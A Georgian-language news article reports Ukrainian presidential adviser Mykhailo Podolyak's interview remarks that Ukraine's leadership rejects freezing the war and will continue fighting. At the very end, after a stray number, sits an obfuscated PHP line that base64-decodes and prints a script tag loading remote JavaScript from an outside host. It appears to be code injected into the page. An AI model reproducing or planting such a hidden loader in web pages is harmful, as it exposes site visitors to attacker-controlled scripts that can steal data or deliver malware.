celsiusi
ავერსი შნაიდერი
უკრაინის სამხედრო-პოლიტიკურ ხელმძღვანელობას ეჭვი არ ეპარება, რომ ომი უკრაინის სცენარით უნდა განვითარდეს, წინააღმდეგ შემთხვევაში, რისთვის იყო ამდენი სიკვდილი, – ამის შესახებ უკრაინის პრეზიდენტის ადმინისტრაციის მრჩეველმა, მიხაილ პოდოლიაკმა „ინტერფაქს-უკრაინასთან“ ინტერვიუში განაცხ.
 
კითხვაზე – და მაინც, ომის გაყინვის ყველა ვარიანტზე უარისა და ბრძოლის გაგრძელების გადაწყვეტილება, არის თუ არა მათ შორის სამხედრო ხელმძღვანელობის გადაწყვეტილება და უჭერენ თუ არა მას სამხედროები, პოდოლიაკი პასუხობს:
 
მისი თქმით, ეს არის კონსოლიდირებული გადაწყვეტილება და პასუხისმგებლობა. უმაღლეს მთავარსარდალს სამხედროებთან ყოველდღიური ურთიერთობა აქვს ოპერატიულ ტაქტიკურ ვითარებასთან დაკავშირებით. 
 
"სამხედრო-პოლიტიკურმა ხელმძღვანელობამ კარგად იცის, საით უნდა წავიდეს უკრაინა. ჩვენ კარგად ვაცნობიერებთ ყველა რისკს, როგორც გაყინულ ომს, ასევე უკრაინის სცენარის მიხედვით დაუსრულებელ ომს”, – აღნიშნავს პოდოლიაკი.
 
პოდოლიაკის განმარტებით, სამხედრო-პოლიტიკური ხელმძღვანელობა ყველანაირად ცდილობს დანაკარგების მინიმალიზებას, ვინაიდან მათთვის, რუსეთისგან განსხვავებით, ადამიანების სიცოცხლე ძვირფასია. რუსეთისთვის მისი სამხედრო კონტიგენტი არაფერია.
 
"სამხედრო-პოლიტიკურ ხელმძღვანელობას ეჭვი არ ეპარება, რომ ომი უნდა განვითარდეს უკრაინის სცენარით. როგორც კი სხვაგვარ გადაწყვეტილებას მივიღებთ, ბანკოვაიაზე მოვა ათასობით ადამიანი, რომელთაც ახლობლები, ოჯახის წევრები, შვილები, ცოლები, ქმრები დაკარგეს და დასვამენ კითხვას: რისთვის იყო ამდენი სიკვდილი? რუსეთი რომ რეალურად წესებით ომობდეს, ნებისმიერ მომენტში შესაძლებელი იქნებოდა თქმა: კარგი, გავიგეთ – ეს ინფრასტრუქტურული ომია, ნადგურდება სამხედრო ობიექტები და ა.შ.
 
თუმცა, აქ საკითხი ასე დგას. მერე ყოველთვის შეგვეკითხებიან, რატომ ისხდნენ ეს ადამიანები, ხუთი წლის ბავშვები სამი თვე სარდაფში და ჭამდნენ იმას, რასაც პოულობდნენ. რატომ დაასახიჩრეს და მოკლეს ხალხი ოკუპანტებმა? ჩვენ ამაზე არ ვუპასუხებთ, თუ დღეს ომს ორი წლით გადავდებთ. ამიტომ არ არსებობს არავითარი დუალიზმი გადაწყვეტილებების მიღებისას – გვჭირდება თუ არა შემდგომი ბრძოლა”, – აცხადებს პოდოლიაკი.
966
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");